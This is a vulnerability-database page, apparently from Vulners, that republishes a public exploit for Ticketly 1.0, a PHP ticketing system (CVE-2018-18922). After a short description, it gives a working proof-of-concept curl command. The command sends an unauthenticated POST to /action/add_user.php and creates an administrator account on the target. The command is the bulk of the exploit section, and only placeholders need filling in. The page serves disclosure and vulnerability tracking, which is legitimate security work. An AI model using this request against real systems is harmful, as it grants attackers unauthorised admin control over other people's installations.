Lucene search
K

Ticketly 1.0 - Cross-Site Request Forgery (Add Admin) Vulnerability

🗓️ 20 Nov 2018 00:00:00Reported by Javier OlmedoType 
zdt
 zdt
🔗 0day.today👁 43 Views

Security vulnerability in Ticketly 1.0 - allows unauthorized admin account creation through CSR

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2018-18922
13 Dec 201819:00
cve
Cvelist
CVE-2018-18922
13 Dec 201819:00
cvelist
Exploit DB
Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
20 Nov 201800:00
exploitdb
EUVD
EUVD-2018-10629
7 Oct 202500:30
euvd
exploitpack
Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
20 Nov 201800:00
exploitpack
NVD
CVE-2018-18922
13 Dec 201819:29
nvd
OSV
CVE-2018-18922
13 Dec 201819:29
osv
Packet Storm
Ticketly 1.0 Cross Site Request Forgery
20 Nov 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
13 Dec 201819:29
prion
# Exploit Title: Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# 4. References:
# https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/
   
# 1. Technical Description:
# Ticketly version 1.0 are affected by a privilege escalation vulnerability,
# an attacker could create an administrator user account by sending a POST
# request to the resource /action/add_user.php without authentication.
 
# 2. Proof Of Concept (PoC):
# Send request curl:
curl -i -s -k  -X $'POST' \
    -H $'Host: [HOST]' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 82' \
    --data-binary $'name=[NAME]&lastname=[LASTNAME]&email=[EMAIL]&status=1&password=[PASS]' \
    $'http://[PATH]/action/add_user.php'

#  0day.today [2018-12-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation